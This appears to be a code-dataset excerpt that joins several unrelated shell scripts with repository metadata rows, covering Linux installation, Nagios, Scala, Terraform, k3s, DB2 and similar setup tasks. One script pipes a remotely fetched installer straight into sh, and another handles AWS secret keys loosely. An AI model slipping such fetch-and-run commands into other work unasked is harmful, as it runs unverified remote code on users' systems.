cp /etc/resolv.conf /etc/resolv.conf_bak
sed "s!# /etc/resolv.conf.tail can replace this line!nameserver $dnsserver\n#/etc/resolv.conf.tail can replace this line!g" /etc/resolv.conf_bak >/etc/resolv.conf
fi
#	else
#		read -p "IP (like 192.168.0.100/24): " ipaddress;
#		read -p "Gateway (like 192.168.0.1): " gateway;
#		ip addr add $ipaddress dev "$network_if";
#		ip route add default via "$gateway";
#		ip "$network_if" up
#	fi
}
# Despite its name this does not run pacstrap: it only pauses so the user
# can edit /etc/pacman.d/mirrorlist on another terminal when a custom
# mirror was requested. The actual bootstrap happens in install_base_devel.
function install_base_system()
{
if [[ "$usecmirror" =~ ^[Yy]$ ]]; then
echo "Please configure now the file /etc/pacman.d/mirrorlist in an other terminal [alt]+[F2-F6]!"
wait_for_usr "Continue?"
fi
}
# Bootstrap the base system into /mnt via pacstrap, adding the base-devel
# group when the user's answer contains a y/Y (matches the original
# unanchored check).
function install_base_devel()
{
  case "$installbasedevel" in
    *[Yy]*) pacstrap /mnt base base-devel ;;
    *)      pacstrap /mnt base ;;
  esac
}
# Install the bootloader package chosen earlier ($bootloader); anything
# other than GRUB or SYSLINUX installs nothing.
function install_bootloader()
{
  case "$bootloader" in
    GRUB)
      echo "Install grub-bios"
      pacstrap /mnt grub-bios
      ;;
    SYSLINUX)
      echo "Install syslinux";
      pacstrap /mnt syslinux
      ;;
  esac
}
# Install the extra packages collected by ask_add_packages, if any.
# Bug fix: $addPac holds a space-separated list, but it was passed to
# pacstrap as one quoted word, so "vim git" became a single (invalid)
# package name. Word-splitting on the list is intentional here.
function install_add_packages()
{
  if [ "$addPac" ]; then
    # shellcheck disable=SC2086 -- deliberate split of the package list
    pacstrap /mnt $addPac
  fi
}
# Generate an fstab for the mounted target system and append it in place.
function gen_fstab()
{
genfstab -p /mnt >> /mnt/etc/fstab
}
# Write locale.conf with the selected $locale (LANG="...").
# Simplified: the original staged the content through a temp file in the
# current directory (locale.conf_new) and copied it over; a direct redirect
# produces the identical end state without the litter.
# $1 (optional) overrides the destination, defaulting to the install target.
function mk_locale_conf()
{
  local dest="${1:-/mnt/etc/locale.conf}"
  echo 'LANG="'"$locale"'"' > "$dest"
}
# Run the first-boot configuration inside the installed system via
# arch-chroot. The unquoted EOF heredoc deliberately expands all $variables
# in THIS shell before the text is fed to the chrooted bash, so the inner
# single quotes do not suppress expansion.
# Bug fix: the localtime symlink used the misspelled variable $zone_parh
# (always empty), producing "ln -s /etc/localtime" instead of linking the
# selected $zone_path.
function chroot_into_new_system()
{
arch-chroot /mnt << EOF
echo "setting network"
cp /etc/rc.conf /etc/rc.conf_bak
sed "s/# interface=/interface=$network_if/g" /etc/rc.conf_bak >/etc/rc.conf
if [ "$nw_method" == "manual" ]; then
cp /etc/rc.conf /etc/rc.conf_bak
sed "s/# address=/address=$ipaddress/g" /etc/rc.conf_bak >/etc/rc.conf
cp /etc/rc.conf /etc/rc.conf_bak
sed "s/# netmask=/netmask=$subnetmask/g" /etc/rc.conf_bak >/etc/rc.conf
cp /etc/rc.conf /etc/rc.conf_bak
sed "s/# gateway=/gateway=$gateway/g" /etc/rc.conf_bak >/etc/rc.conf
cp /etc/rc.conf /etc/rc.conf_bak
sed "s/# broadcast=/broadcast=$broadcast/g" /etc/rc.conf_bak >/etc/rc.conf
cp /etc/resolv.conf /etc/resolv.conf_bak
sed "s!# /etc/resolv.conf.tail can replace this line!nameserver $dnsserver\n# /etc/resolv.conf.tail can replace this line!g" /etc/resolv.conf_bak >/etc/resolv.conf
rm /etc/resolv.conf_bak
fi
rm /etc/rc.conf_bak
echo "Setting hostname...";
cp /etc/hosts /etc/hosts_bak
sed "s/# End of file/127.0.0.1 $hostname.$localdomain $hostname\n\n#End of file/g" /etc/hosts_bak >/etc/hosts
cp /etc/hosts /etc/hosts_bak
sed "s/# End of file/::1 $hostname.$localdomain $hostname\n\n#End of file/g" /etc/hosts_bak >/etc/hosts
rm /etc/hosts_bak
echo "$hostname" > /etc/hostname
echo "Setting zoneinfo...";
ln -s $zone_path /etc/localtime
echo "setting up locale...";
locale -a
cp /etc/locale.gen /etc/locale.gen_bak
sed 's/#$locale/$locale/g' /etc/locale.gen_bak >/etc/locale.gen
rm /etc/locale.gen_bak
locale-gen
if [ $kbl ]; then
echo "Saving keyboardlayout...";
echo "KEYMAP=$kbl" >/etc/vconsole.conf
echo "FONT=lat9w-16" >>/etc/vconsole.conf
echo "FONT_MAP=8859-1_to_uni" >>/etc/vconsole.conf
fi
echo "mkinitcpio -p linux..."
mkinitcpio -p linux
echo "Starting dm-mod...";
if [ "$bootloader" == "GRUB" ]; then
modprobe dm-mod
echo "Install and configure GRUB..."
grub-install --recheck --debug /dev/"$device"
mkdir -p /boot/grub/locale
cp /usr/share/locale/en\@quot/LC_MESSAGES/grub.mo /boot/grub/locale/en.mo
grub-mkconfig -o /boot/grub/grub.cfg
elif [ "$bootloader" == "SYSLINUX" ]; then
echo "Install syslinux";
/usr/sbin/syslinux-install_update -iam
fi
passwd << EOPF
$passwd1
$passwd2
EOPF
clear
exit
EOF
}
# Unmount the target tree in dependency order: /mnt/boot, the optional
# separate /mnt/home, and finally /mnt itself.
function unmount()
{
  local mounts=(/mnt/boot)
  if [[ "$usesephome" =~ ^[Yy]$ ]]; then
    mounts+=(/mnt/home)
  fi
  mounts+=(/mnt)
  local m
  for m in "${mounts[@]}"; do
    umount "$m"
  done
}
# ---- main flow -------------------------------------------------------------
# Interactive phase first (all questions collected up front) ...
ask_for_keyboard
ask_use_fdisk
config_fdisk
set_fs "boot" "ext2"
set_fs "" "ext3"
if [[ "$usesephome" =~ ^[Yy]$ ]]; then
set_fs "home" "ext3"
fi
#############################################################################
#
# starting install procedure
#
#sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ask_bootloader
ask_network_method
ask_network_if
ask_custom_mirror
ask_base_devel
ask_add_packages
ask_for_zone
ask_for_hostname
ask_for_localdomain
ask_locale
ask_for_root_password
# ... then the destructive steps run unattended.
do_partition
do_formating
do_mount
do_network
install_base_system
install_base_devel
install_bootloader
install_add_packages
gen_fstab
mk_locale_conf
chroot_into_new_system
unmount
# NOTE(review): sh_contact is not defined in this chunk - presumably
# declared earlier in the file; verify before reuse.
sh_contact
| true
|
b31af16a82114bfbc85d318e6d0b5bec4f7bddb4
|
Shell
|
mjmunger/nagios-asterisk-plugin
|
/check_phone.sh
|
UTF-8
| 1,353
| 3.9375
| 4
|
[] |
no_license
|
#!/bin/bash
# Nagios plugin: report the status of a SIP peer registered with a local
# Asterisk server. Usage: check_phone.sh <peer-name>
# Exit codes follow Nagios conventions: 0 = OK, 1 = warning, 2 = critical.
#
# Fixes in this revision:
#  * 'if ["$DEBUG" == 1 ]' (three occurrences) - the missing space after
#    '[' made bash search for a command named '[0', so debug logging never
#    fired and each check printed "command not found" on stderr.
#  * $PART1 was used but never assigned; the empty expansion produced a
#    stray blank echo and a doubled space in the OK output.
DEBUG=0

if [ "$#" -eq 0 ]; then
	MSG="You must pass an extension as an argument to check its status! Config fail."
	echo $MSG
	logger $MSG
	exit 2
fi

if [ "$DEBUG" == 1 ]; then
	logger Checking status of SIP $1
fi

# One line of 'sip show peers' output for the requested peer.
LINE=`asterisk -rx' sip show peers' | grep "^$1"`

if [ "$DEBUG" == 1 ]; then
	logger LINE: "$LINE"
fi

# Figure out the column count, and adjust the target column accordingly:
LASTCOL=`echo $LINE | awk '{print $NF}'`

case $LASTCOL in
	"ms)")
		# Monitored and answering: status lives three fields from the end.
		COLUMN=`echo $LINE | awk '{ print $(NF-2) }'`
		;;
	"UNKNOWN")
		echo "Phone appears to be offline or lagged"
		logger "exiting status 2 (Critical) for SIP $1"
		exit 2
		;;
	"Unmonitored")
		echo "This peer is unmonitored. Try setting keepalive."
		exit 1
		;;
esac

if [ "$DEBUG" == 1 ]; then
	logger "$COLUMN"
fi

if [ "$COLUMN" == "OK" ]; then
	logger "SIP $1 OK, getting ping"
	#Split the line on "OK" to get the ping.
	PART2=`asterisk -rx"sip show peers" | grep $1 | awk -F "OK" '{ print $2 }'`
	logger SIP ping=$PART2
	STATUS="$PART2"
	logger SIP $1 $STATUS
	echo "OK $STATUS"
	logger "exiting status 0 (OK)"
	exit 0
else
	echo "Phone appears to be offline or lagged"
	logger "exiting status 2 (Critical) for SIP $1"
	exit 2
fi
| true
|
1942c8bde2447f2dd55f1654c1636f0dea271313
|
Shell
|
alessandroleite/vagrant-mesos-spark
|
/scripts/setup-scala.sh
|
UTF-8
| 806
| 3.671875
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
source "/vagrant/scripts/common.sh"
#http://scala-lang.org/download/install.html
# Install the system-wide Scala environment script into /etc/profile.d.
# Relies on $SCALA_RES_DIR exported by the sourced common.sh.
function setupEnvVars {
echo "creating scala environment variables"
cp -f $SCALA_RES_DIR/scala.sh /etc/profile.d/scala.sh
}
# Download (or reuse a cached copy of) the Scala tarball, unpack it under
# /usr/lib, symlink /usr/lib/scala, then install sbt from the bintray repo.
# Uses $SCALA_ARCHIVE, $SCALA_MIRROR_DOWNLOAD, $SCALA_VERSION and the
# resourceExists helper from the sourced common.sh.
# Fix: quoted all path/URL expansions so values containing spaces or glob
# characters no longer word-split.
function installScala {
  echo "install scala"
  FILE="/vagrant/resources/$SCALA_ARCHIVE"
  if resourceExists "$SCALA_ARCHIVE"; then
    echo "install scale from local file"
  else
    curl -o "$FILE" -O -L "$SCALA_MIRROR_DOWNLOAD"
  fi
  tar -xzf "$FILE" -C /usr/lib
  ln -s "/usr/lib/$SCALA_VERSION" /usr/lib/scala

  # install sbt http://www.scala-sbt.org/release/tutorial/Installing-sbt-on-Linux.html
  echo "deb http://dl.bintray.com/sbt/debian /" | sudo tee -a /etc/apt/sources.list.d/sbt.list
  apt-get update -y
  apt-get install -y sbt --force-yes
}
echo "setup scala"
installScala
setupEnvVars
| true
|
6a3e7e10554ec1443f415c77f0aac5fae6708163
|
Shell
|
lastmansleeping/TableLingo
|
/evaluate.sh
|
UTF-8
| 559
| 2.9375
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Score every available model prediction against the DART references.
# For each model/version/split combination run pipeline/evaluate.py when a
# prediction file exists; otherwise print a loud notice.

MODELS_DIR="models"
DART_TARGET="data/dart/tgt"
DART_DEPTH="data/dart/depth"

models=(bart t5 robertashare)
versions=(v0 v1 v2)
splits=(dev test)

for MODEL in "${models[@]}"; do
    for VERSION in "${versions[@]}"; do
        for SPLIT in "${splits[@]}"; do
            pred="${MODELS_DIR}/${MODEL}_${VERSION}/pred/${SPLIT}.txt"
            if [ -f "$pred" ]; then
                python pipeline/evaluate.py \
                    --pred "$pred" \
                    --ref "${DART_TARGET}/${SPLIT}.txt" \
                    --depth "${DART_DEPTH}/${SPLIT}.txt"
            else
                echo "!!! $pred does not exist !!!"
            fi
        done
    done
done
| true
|
f396a2d7eface3fcd0b0f94f2027a5ad8ccfc6db
|
Shell
|
TianhaoFu/paraflow
|
/paraflow-1.0-alpha1/sbin/logclean.sh
|
UTF-8
| 842
| 3.578125
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Deploy and run the per-host paraflow log-cleanup script over SSH.
# Hosts are $PREFIX"0"$i for i in START..END (single-digit suffixes only).
PREFIX="dbiir"
START=2
END=9
PARAFLOW_HOME="/home/iir/opt/paraflow"
PARAFLOW_DIR="/home/iir/opt/paraflow-1.0-alpha1"
deploy()
{
if [ $(id -u) != "0" ]; then
echo "please run $0 $1 in root."
exit 0
fi
for ((i=$START; i<=$END; i++))
do
if [ $i -lt 10 ]; then
echo "init the logclc.sh on dbiir0$i"
scp $PARAFLOW_DIR"/sbin/paraflow_logclean.sh" $PREFIX"0"$i:$PARAFLOW_DIR"/sbin/"
ssh $PREFIX"0"$i "chown -R iir:iir $PARAFLOW_DIR"
fi
done
}
# start
# Run the already-deployed cleanup script on every host in sequence.
startup()
{
for ((i=$START; i<=$END; i++))
do
ssh $PREFIX"0"$i "$PARAFLOW_DIR/sbin/paraflow_logclean.sh"
echo "0$i clean have finished,content: the log produced by paraflow"
done
}
if [ "$1" == "deploy" ]; then
deploy
elif [ "$1" == "start" ]; then
startup
# nothing
else
echo "Usage: $0 deploy|start"
fi
| true
|
f7260cf0fedc9031c4132d9abec393be03903c26
|
Shell
|
rtauxerre/iptv
|
/package/build.sh
|
UTF-8
| 309
| 3.296875
| 3
|
[] |
no_license
|
#! /bin/sh
# Remove previous packages
rm -fv iptv*.deb
# Build the package
fakeroot dpkg-deb --build iptv
# Get the version number of the package
VERSION=$(cat iptv/DEBIAN/control | grep Version | awk '{print $2}')
# Rename the package to include the version number
mv -fv iptv.deb iptv_${VERSION}.deb
| true
|
2cf778c58863c9d7846d016cde9a14e975338f92
|
Shell
|
BIX-Digital/ods-contrib
|
/pipeline/provision-repository.sh
|
UTF-8
| 5,035
| 4.15625
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
set -ue
set -o pipefail
##################################################
## This script can be used to create an empty
## repository, setup with webhooks.
###################################################
BITBUCKET_URL=""
COMPONENT_ID=""
PROJECT_ID=""
TEMPLATE_URL=""
# Print the CLI usage (one option per line) to stdout. %b expands the
# embedded \t escapes exactly like the original per-line printf calls did.
function usage {
    printf '%b\n' \
        'Usage:' \
        '\t--help|-h\t\t\tPrints the usage' \
        '\t-v|--verbose\tVerbose output' \
        "\t--bitbucket\tBitbucket URL, e.g. 'https://bitbucket.example.com'" \
        '\t--project\tProject ID of the Bitbucket Project' \
        '\t--component\tComponent ID of the project, usually is equivalent to bitbucket repo name' \
        '\t--template\tTemplate URL to use for new repository (must be a .tgz file like https://github.com/bix-digital/ods-pipeline-examples/tarball/jupyter-lab)'
}
while [[ "$#" -gt 0 ]]; do case $1 in
-v|--verbose) set -x;;
-h|--help) usage; exit 0;;
--bitbucket=*) BITBUCKET_URL="${1#*=}";;
--bitbucket) BITBUCKET_URL="$2"; shift;;
--project) PROJECT_ID="$2"; shift;;
--project=*) PROJECT_ID="${1#*=}";;
--component) COMPONENT_ID="$2"; shift;;
--component=*) COMPONENT_ID="${1#*=}";;
--template) TEMPLATE_URL="$2"; shift;;
--template=*) TEMPLATE_URL="${1#*=}";;
*) echo "Unknown parameter passed: $1"; exit 1;;
esac; shift; done
#############
##### Check required parameters
#############
# Abort early when a mandatory flag is missing.
if [ -z ${PROJECT_ID} ]; then
    echo "Param --project is missing."; usage; exit 1;
elif [ -z ${COMPONENT_ID} ]; then
    echo "Param --component is missing."; usage; exit 1;
fi
#############
##### Set variables
#############
# Derive normalized identifiers from the raw CLI inputs.
# Project name is all lowercase
PROJECT_ID=$(echo "${PROJECT_ID}" | tr '[:upper:]' '[:lower:]')
# Component name is all lowercase
COMPONENT_ID=$(echo "${COMPONENT_ID}" | tr '[:upper:]' '[:lower:]')
# Bitbucket repository is all lowercase
BITBUCKET_REPO_NAME=$(echo "${PROJECT_ID}-${COMPONENT_ID}" | tr '[:upper:]' '[:lower:]')
# Bitbucket project is all uppercase
BITBUCKET_PROJECT=$(echo "${PROJECT_ID}" | tr '[:lower:]' '[:upper:]')
# OpenShift project is all lowercase
OPENSHIFT_CD_PROJECT=$(echo "$PROJECT_ID-cd" | tr '[:upper:]' '[:lower:]')
#############
##### Checks
#############
echo "Performing checks ..."
command -v git &> /dev/null || (echo "You need to install 'git' to use this script." && exit 1)
if [ -d "${BITBUCKET_REPO_NAME}" ]; then
echo "Directory ${BITBUCKET_REPO_NAME} already exists in working directory."; exit 1;
fi
command -v oc &> /dev/null || (echo "You need to install 'oc' to use this script." && exit 1)
oc whoami > /dev/null || (echo "Please log into OpenShift using 'oc login'." && exit 1)
#############
##### Execute
#############
echo "Pulling info from OpenShift ..."
webhookURL=$(oc -n "${OPENSHIFT_CD_PROJECT}" get routes/ods-pipeline --template 'http{{if .spec.tls}}s{{end}}://{{.spec.host}}/bitbucket')
webhookSecret=$(oc -n "${OPENSHIFT_CD_PROJECT}" get secret/ods-bitbucket-webhook -o=jsonpath='{.data.secret}' | base64 --decode)
echo "Please enter a Bitbucket access token with admin permissions:"
read -s BITBUCKET_TOKEN
basicAuthHeader="Authorization: Bearer ${BITBUCKET_TOKEN}"
echo "Creating Bitbucket repository ..."
curl -sS -X POST "$BITBUCKET_URL/rest/api/1.0/projects/$BITBUCKET_PROJECT/repos" \
-H "${basicAuthHeader}" \
-H "Content-Type: application/json" \
-d '{"name": "'"$BITBUCKET_REPO_NAME"'"}'
echo ""
echo "Configuring repository webhook ..."
curl -sS -X POST "$BITBUCKET_URL/rest/api/1.0/projects/$BITBUCKET_PROJECT/repos/$BITBUCKET_REPO_NAME/webhooks" \
-H "${basicAuthHeader}" \
-H "Content-Type: application/json" \
-d '{
"name": "ODS Pipeline",
"events": [
"repo:refs_changed"
],
"configuration": {
"secret": "'"$webhookSecret"'"
},
"url": "'"$webhookURL"'",
"active": true
}
'
echo ""
echo "Cloning created repository ..."
git clone "${BITBUCKET_URL}/scm/${BITBUCKET_PROJECT}/${BITBUCKET_REPO_NAME}.git"
if [ -n "${TEMPLATE_URL}" ]; then
command -v tar &> /dev/null || (echo "You need to install 'tar' to populate from template." && exit 1)
echo "Populating repository with template ..."
cd "${BITBUCKET_REPO_NAME}"
curl -L "${TEMPLATE_URL}" | tar -xz
shopt -s dotglob
mv */* .
command -v sed &> /dev/null || (echo "You need to install 'sed' to manipulate the template." && exit 1)
echo "Replacing @project@ and @component@ in template ..."
if [ -f ods.yaml ]; then
sed -i '' "s/@project@/${PROJECT_ID}/" ods.yaml
sed -i '' "s/@component@/${COMPONENT_ID}/" ods.yaml
fi
if [ -f ods.yml ]; then
sed -i '' "s/@project@/${PROJECT_ID}/" ods.yaml
sed -i '' "s/@component@/${COMPONENT_ID}/" ods.yaml
fi
if [ -f chart/Chart.yaml ]; then
sed -i '' "s/@project@/${PROJECT_ID}/" chart/Chart.yaml
sed -i '' "s/@component@/${COMPONENT_ID}/" chart/Chart.yaml
fi
echo ""
echo "Repository has been populated from the template in your working copy."
echo "Adjust and commit the files as needed."
fi
echo ""
echo "Done"
| true
|
a68abe03c62bf631e2bf6deba935e0831048e685
|
Shell
|
peterklipfel/firesuit
|
/aws.sh
|
UTF-8
| 972
| 2.78125
| 3
|
[] |
no_license
|
# Provision a juju/LXC orchestration host, template environments.yaml with
# random secrets plus the user's AWS keys, and install the firesuit CLI.
codename=`cat /etc/lsb-release | grep CODENAME | cut -f2 -d'='`
sudo apt-get -y install software-properties-common
sudo add-apt-repository ppa:juju/stable
sudo apt-get update
sudo apt-get -y install juju-core lxc mongodb-server
echo "preparing orchsetration environment"
# Substitute placeholder secrets with 30 random alphabetic characters each.
sed s/notsosecret/`tr -dc "[:alpha:]" < /dev/urandom | head -c 30`/ aws.yaml > tmp.yaml
sed s/notsounique/`tr -dc "[:alpha:]" < /dev/urandom | head -c 30`/ tmp.yaml > uniquified.yaml
rm tmp.yaml
echo "Type your amazon access key, followed by [ENTER]:"
read access_key
echo "Type your amazon secret key, followed by [ENTER]:"
read secret_key
# NOTE(review): the keys are interpolated unescaped into sed patterns -
# a key containing '/' or '&' would corrupt the substitution.
sed s/youraccesskey/$access_key/ uniquified.yaml > tmp.yaml
sed s/yoursecretkey/$secret_key/ tmp.yaml > environments.yaml
rm tmp.yaml
rm uniquified.yaml
mkdir ~/.juju
mv environments.yaml ~/.juju/environments.yaml
echo "setting up firesuit"
sudo ln -s `pwd`/lib/firesuit /usr/bin/firesuit
echo "generating ssh keys"
ssh-keygen -t rsa -C "firesuit@master"
| true
|
b1c8efff18a77061f3b2354e24b9840252968972
|
Shell
|
MorrellLAB/sequence_handling
|
/SlurmJobScripts/Genotype_GVCFs.job
|
UTF-8
| 643
| 2.84375
| 3
|
[] |
no_license
|
#!/bin/bash
# This script is for submitting a job to Slurm via sbatch
# Thin wrapper: load the project config and the Genotype_GVCFs handler,
# then invoke it with the positional job parameters plus config values.

set -e
set -o pipefail

# Required input arguments
CONFIG=$1
SEQUENCE_HANDLING=$2
GG_MEM=$3
input_gvcf=$4
SINGLE_ARRAY_LIMIT=$5
gatkVer=$6
intvlFile=$7
parallelizeQ=$8
analysisType=$9
scaffoldsFile=${10}

source ${CONFIG}
source ${SEQUENCE_HANDLING}/Handlers/Genotype_GVCFs.sh

# Call on function
# Variables below are stored in CONFIG
Genotype_GVCFs ${input_gvcf} ${OUT_DIR} ${GATK_JAR} ${REF_GEN} ${THETA} ${PLOIDY} ${GG_MEM} ${REF_DICT} ${SINGLE_ARRAY_LIMIT} ${gatkVer} ${intvlFile} ${parallelizeQ} ${analysisType} ${scaffoldsFile} ${GG_COMBINED_VCF} ${PROJECT} ${TMP}
| true
|
10291b5a5fb794e0100eed69bfc0205db4b1fc1e
|
Shell
|
yesteph/meetup-cd
|
/terraform/blue-green/demo.sh
|
UTF-8
| 1,240
| 3
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Interactive blue/green deployment demo: each 'read -n 1' pauses for a
# keypress before the next terraform phase (create green, deploy app,
# promote, finalize).
set -e

TF_WORKSPACE=blue-green
DOCKER_TAG=v1

read -n 1 -p "Apply TF in commons - deployment_step=create_green ?" mainmenuinput
cd commons
terraform init -get -reconfigure
terraform workspace select ${TF_WORKSPACE}
terraform apply -var deployment_step=create_green -auto-approve
GREEN_ENV=$(terraform output green_env)
GREEN_ENDPOINT=http://$(terraform output green-service-endpoint)
cd -

read -n 1 -p "Apply TF in guestbook-datastore ?" mainmenuinput
cd guestbook-datastore
terraform init -get -reconfigure
terraform workspace select ${TF_WORKSPACE}
terraform apply -auto-approve
cd -

read -n 1 -p "Apply TF in guestbook-service/workspace: ${TF_WORKSPACE}-${GREEN_ENV}/ docker_tag=${DOCKER_TAG} ?" mainmenuinput
cd guestbook-service
terraform init -get -reconfigure
terraform workspace select ${TF_WORKSPACE}-${GREEN_ENV}
terraform apply -var docker_tag=${DOCKER_TAG} -auto-approve
cd -

read -n 1 -p "You can preview new release ${GREEN_ENDPOINT} ... Want to promote ?" mainmenuinput
cd commons
terraform apply -var deployment_step=promote_green -auto-approve
read -n 1 -p "Want to mark current green as new blue ?" mainmenuinput
terraform apply -var deployment_step=finalize_deployment -auto-approve
cd -
|
b84938775ae906e44448c23ac71a97e136f81561
|
Shell
|
RedBaron80/urlpath
|
/install.sh
|
UTF-8
| 1,201
| 2.6875
| 3
|
[] |
no_license
|
#!/bin/bash
# Provision a single-node k3s cluster, build the two app images with Docker,
# import them into the k3s containerd registry, and apply the manifests.
sudo apt-get update
sudo apt-get upgrade -y
sudo apt-get install unzip docker.io -y
# Downloading the software
wget https://github.com/RedBaron80/urlpath/archive/master.zip
unzip master.zip
# Installing kubernetes k3s
curl -sfL https://get.k3s.io | sh -
# Permissions
sudo chown ubuntu /etc/rancher/k3s/k3s.yaml
# sudo usermod -aG docker ubuntu # we would have to log out and log in again
sudo docker build urlpath-master/httpd-proxy -t httpd-proxy:1.0
sudo docker build urlpath-master/urlpath-django -t urlpath:1.0
# Importing images to k3s local registry
sudo docker save --output urlpath.tar urlpath:1.0
# NOTE(review): this deployment is applied BEFORE its image is imported
# (the import happens a few lines down, followed by a second apply) -
# verify the ordering/duplication is intentional.
# Applying kubernetes configuration
kubectl apply -f urlpath-master/kubernetes/urlpath-deployment.yaml
sudo docker save --output httpd-proxy.tar httpd-proxy:1.0
sudo k3s ctr images import httpd-proxy.tar
kubectl apply -f urlpath-master/kubernetes/httpd-proxy-deployment.yaml
sudo k3s ctr images import urlpath.tar
kubectl apply -f urlpath-master/kubernetes/urlpath-deployment.yaml
kubectl apply -f urlpath-master/kubernetes/httpd-proxy-service.yaml
kubectl apply -f urlpath-master/kubernetes/urlpath-service.yaml
kubectl apply -f urlpath-master/kubernetes/ingress.yaml
echo "Done!!"
|
45cba8c82180cf31102e1707e292a6b76534de35
|
Shell
|
semyon-gordeev/jibri
|
/scripts/launch_recording.sh
|
UTF-8
| 501
| 3.140625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Jibri recording launcher: positional args are kept for compatibility, but
# only $2 (the stream target) is still used - the YouTube URL assembly
# below is commented out and start-ffmpeg.sh receives the raw stream.
#Directory for storing pids (should be writeable by jibri user)
PID_DIR=/var/run/jibri/
URL=$1
STREAM=$2
TOKEN=$3
YOUTUBE_STREAM_ID=$4
YOUTUBE_BACKUP=$5
#
#YOUTUBE_BASE="rtmp://a.rtmp.youtube.com/live2"
#
#if [ ! -z "$5" ]; then
#    YOUTUBE_BASE="rtmp://b.rtmp.youtube.com/live2"
#fi
#
#if [ ! -z "$4" ]; then
#    STREAM="${YOUTUBE_BASE}/${YOUTUBE_STREAM_ID}"
#
#    if [ ! -z "$5" ]; then
#        STREAM="${STREAM}?backup=1"
#    fi
#
#fi

$PWD/../scripts/start-ffmpeg.sh "$STREAM"
| true
|
9d1d3546468d512469590e4a4c7e96ed2d2cfd09
|
Shell
|
vishnu388/shell-programming
|
/sequance-programming/sumNum.sh
|
UTF-8
| 208
| 2.8125
| 3
|
[] |
no_license
|
#!/bin/bash -x
# Read five integers and report their sum and (truncating integer) average.
# Fix: the original computed result/avg but never printed them, so the
# script produced no visible output except the -x trace.
read -p "Enter 1st number:" a
read -p "Enter 2nd number:" b
read -p "Enter 3rd number:" c
read -p "Enter 4th number:" d
read -p "Enter 5th number:" e
result=$((a+b+c+d+e))
# Integer division - the fractional part is discarded.
avg=$((result/5))
echo "Sum: $result"
echo "Average: $avg"
| true
|
cf5232c558a62f8a31904cb813451b61dcef359e
|
Shell
|
ArcherCraftStore/ArcherVMPeridot
|
/phpMyAdmin/libraries/plugins/transformations/generator_main_class.sh
|
UTF-8
| 363
| 3.546875
| 4
|
[
"GPL-2.0-only",
"GPL-1.0-or-later",
"GPL-3.0-only",
"MIT",
"Apache-2.0"
] |
permissive
|
#!/bin/bash
#
# Create only the main class for a new transformation plug-in by delegating
# to generator_plugin.sh with the --generate_only_main_class switch.
#
# $1: MIMEType
# $2: MIMESubtype
# $3: Transformation Name

if [ $# -ne 3 ]; then
    echo -e "Usage: ./generator_main_class.sh MIMEType MIMESubtype TransformationName\n"
    exit 65
fi

./generator_plugin.sh "$1" "$2" "$3" "--generate_only_main_class"
| true
|
bfe929270d4c6db1bc432992177112b05be36977
|
Shell
|
nickivanov/db2_autostart_scripts
|
/db2_rhel
|
UTF-8
| 3,011
| 4.0625
| 4
|
[
"Apache-2.0"
] |
permissive
|
#! /bin/sh
#
# /etc/init.d/db2
#
#
# System startup script for the DB2 instances.
# Will start/stop whatever instances are enabled to
# start at boot time in the DB2 global registry.
# See the DB2 Information Center for the db2greg
# utility for more details.
#
# This is specific for RHEL, may not work on other
# distributions.
#
# Edit the DB2_INSTALL_PATH variable. Drop this script
# in /etc/init.d. Call `chkconfig --add db2`.
#
# Copyright 2013 Nick Ivanov
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
### BEGIN INIT INFO
# Provides: db2
# Required-Start: $local_fs
# Required-Stop: $local_fs
# X-Start-Before: $network
# X-Stop-After: $network
# Default-Start: 3 5
# Default-Stop: 0 1 2 6
# Short-Description: Start/stop DB2 instance processes
### END INIT INFO
# DB2 installation path; only one if multiple versions installed
# !!! Change this according to your environment
DB2_INSTALL_PATH=/opt/ibm/db2/V10.1
# Source common functions
. /etc/init.d/functions
# Emit one line per registered DB2 instance from the global registry:
# "<instance> <instance-dir> <autostart-flag>" (fields 4, 5 and 7 of the
# 'I,DB2' records in the db2greg dump).
list_instances() {
    $DB2_INSTALL_PATH/bin/db2greg -dump | grep -E '^I,DB2' | \
        cut -d, --output-delimiter=" " -s -f4,5,7
}
# Succeed iff a db2sysc process is running under exactly the user name $1.
# Fix: the old 'grep -c $1 >/dev/null' matched substrings, so checking
# instance "db2" would wrongly count "db2inst1" processes as a match.
# grep -qx requires a whole-line (exact) match and keeps the silent exit
# status the callers rely on.
checkproc() {
	ps -C db2sysc --no-heading -o uname | grep -qx "$1"
}
# start/stop/status dispatcher over all registry instances.
# NOTE(review): RET is modified inside 'list_instances | while ...'
# pipelines, i.e. in a subshell, so 'exit $RET' below can never see those
# updates; also 'RET+=$RC' is string append (a bashism) under #!/bin/sh.
# Both look like latent bugs - confirm before relying on the exit code.
RET=0
case "$1" in
    start)
	echo "Checking DB2 instances..."
	# read DB2 instances from the global registry
	list_instances | while read INST INSTDIR AUTOSTART
	do
	    if [ $AUTOSTART -eq 1 ]
	    then
		echo -n " $INST"
		su - $INST -c $INSTDIR/adm/db2start>/dev/null& # send to background
		RC=$?
		[ $RC -eq 0 ] && success || failure
		echo
		RET+=$RC
	    fi
	done
	;;
    status)
	echo "Checking for DB2 instances..."
	list_instances | while read INST INSTDIR AUTOSTART
	do
	    echo -n " $INST"
	    checkproc $INST
	    RC=$?
	    [ $RC -eq 0 ] && success # just report those that are running
	    [ $RC -gt 0 -a $AUTOSTART -eq 1 ] && failure # autostart instances should be running
	    [ $RC -gt 0 -a $AUTOSTART -ne 1 ] && passed # ignore non-autostart instances
	    echo
	done
	;;
    stop)
	echo "Stopping all DB2 instances..."
	list_instances | while read INST INSTDIR AUTOSTART
	do
	    checkproc $INST
	    RC=$?
	    if [ $RC -eq 0 ]
	    then
		echo -n " $INST"
		su - $INST -c "$INSTDIR/adm/db2stop force">/dev/null # wait for it to stop
		RC=$?
		[ $RC -eq 0 ] && success || failure
		echo
